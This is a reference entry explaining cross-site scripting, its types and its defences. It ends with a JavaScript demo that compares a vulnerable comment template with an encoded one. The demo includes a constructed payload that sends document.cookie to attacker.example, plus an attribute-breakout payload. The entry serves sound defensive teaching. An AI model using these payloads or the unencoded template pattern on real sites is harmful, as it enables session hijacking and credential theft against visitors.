Cross-Site Scripting (XSS)
A web vulnerability in which attackers inject malicious scripts into trusted websites, which then execute in visitors' browsers to steal data or perform actions on their behalf.
Also known as: XSS, cross-site script injection
Last reviewed: 10 June 2026
Cross-site scripting (XSS) occurs when a website places user-supplied input in a page without encoding it for the context in which it appears, so the browser parses attacker-controlled data as markup or script. The injected script runs in the victim's browser within the origin of the trusted site; the same-origin policy offers no protection here because, from the browser's point of view, the script is the site's own. The attacker's code can therefore read any cookie not marked HttpOnly and send it off-site to hijack the session, overlay a fake login form on the page to harvest credentials, log keystrokes, or redirect the victim to a malicious site.
XSS is one of the most common web vulnerabilities. It is usually classified by where the payload comes from. In stored XSS the payload is saved on the server (a database record, a profile field, a log that is later displayed) and served to every visitor who views the affected page. In reflected XSS the payload travels in a crafted request, typically a URL parameter, and is echoed back in the response only to the user who follows the link. In DOM-based XSS the payload need not reach the server at all: client-side JavaScript reads attacker-controlled data (for example from location.hash or a postMessage event) and writes it into the page through a sink such as innerHTML, document.write or eval.
Website developers should encode untrusted data for the context in which it is output (HTML text, attribute value, JavaScript string, URL), preferably through a templating engine that does so by default, and deploy a Content Security Policy (CSP) as defence in depth so that an injected inline script cannot execute even where an encoding step was missed. Marking session cookies HttpOnly keeps them out of reach of injected script. Sanitising input on the way in is a weaker substitute, because the same string can be harmless in one output context and dangerous in another. Users benefit from keeping browsers updated and using script-blocking extensions on untrusted sites.
Examples
- An attacker posts a comment on a forum containing a script; every visitor who loads the page has their session cookie silently sent to the attacker.
- A crafted URL sent via email triggers a reflected XSS attack that submits a fund-transfer form while the victim is logged in; because the script runs in the site's own origin it can read the page's anti-CSRF token and include it in the request, so CSRF protections do not stop it.
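The forum-comment scenario above, as an added example that is not part of this entry and not code from any real site: a server-side comment template that concatenates untrusted fields into markup, beside the same template hardened with contextual output encoding. A small start-tag scanner is included only so the difference can be checked offline without a browser. Every name here (renderCommentUnsafe, renderCommentSafe, escapeHtml, startTags, hasInjectedScript, CSP_HEADER) and both payloads are constructed for the illustration.

```javascript
// Added example for this entry; not code from any real site or library.
// Names, payloads and the CSP value below are constructed for illustration.

// Encoder for the HTML text and double-quoted attribute contexts. Every
// character that can change the tokenizer's state there becomes an entity,
// so untrusted data can neither open a tag nor close the quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// VULNERABLE: attacker-controlled fields are concatenated straight into markup.
function renderCommentUnsafe(comment) {
  return `<div class="comment" data-author="${comment.author}">`
    + `<p>${comment.body}</p></div>`;
}

// HARDENED: the same template, with each untrusted value encoded for the
// context it lands in (text node and double-quoted attribute value).
function renderCommentSafe(comment) {
  return `<div class="comment" data-author="${escapeHtml(comment.author)}">`
    + `<p>${escapeHtml(comment.body)}</p></div>`;
}

// Minimal start-tag scanner, sufficient for this demo: returns every start
// tag with its attributes, honouring quoted values the way a browser does
// (a raw '"' closes the value; an encoded &quot; is ordinary text). Not a parser.
function startTags(html) {
  const tagRe = /<([a-zA-Z][\w-]*)((?:\s+[\w:-]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
  const attrRe = /([\w:-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const tags = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// True when the rendered markup contains a <script> element or any on*
// event-handler attribute; the template itself emits neither.
function hasInjectedScript(html) {
  return startTags(html).some((t) =>
    t.name === 'script' || Object.keys(t.attrs).some((k) => /^on[a-z]+$/.test(k)));
}

// Constructed payloads (not working attacks against any real site).
// 1) The forum example: a comment that ships document.cookie off-site.
const storedPayload = {
  author: 'mallory',
  body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
};
// 2) Attribute-context breakout: no '<' at all, so a filter that only strips
//    tags would miss it; the '"' ends data-author and adds an event handler.
const attributePayload = {
  author: 'x" onmouseover="alert(document.domain)',
  body: 'hello',
};

// Defence in depth for the template that forgets to encode: under this policy
// a browser refuses inline <script> blocks and on* handlers, and connect-src
// stops fetch() from reaching attacker.example. An assumed policy for this
// example, to be adapted per site.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; connect-src 'self'";

// Renders both payloads both ways and reports which outputs carry script.
function demo() {
  const results = {};
  for (const [name, payload] of Object.entries({ storedPayload, attributePayload })) {
    results[name] = {
      unsafe: hasInjectedScript(renderCommentUnsafe(payload)),
      safe: hasInjectedScript(renderCommentSafe(payload)),
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

escapeHtml is correct only for the two contexts the template uses. A value placed inside a JavaScript string, a URL, or a CSS declaration needs a different encoder, and encoding an href does nothing against a javascript: URL; that is the reason to prefer a templating engine that picks the encoder per context over a hand-written helper.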